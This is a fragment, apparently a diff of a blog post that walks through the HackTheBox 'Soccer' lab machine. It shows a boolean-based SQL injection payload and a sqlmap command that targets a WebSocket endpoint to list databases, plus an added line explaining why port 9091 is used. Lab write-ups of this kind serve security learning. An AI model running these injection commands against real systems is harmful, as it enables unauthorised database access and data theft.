kchen4028/kchen4028.github.io/_posts/2025-04-17-HTB-Soccer.md

     Payload: {"id":"-9663 OR 8964=8964"}

 ```
+To clarify why we need port 9091, it is because the intercepted request from Burpsuite shows that the WebSocket request is being sent to http://soc-player.soccer.htb:9091/

 Now we add the --dbs subcommand to get the list of databases
 ```
 sqlmap -u 'ws://soc-player.soccer.htb:9091/' --data '{"id":"*"}' --technique=B --risk 3 --level 5 --batch --dbs --threads 10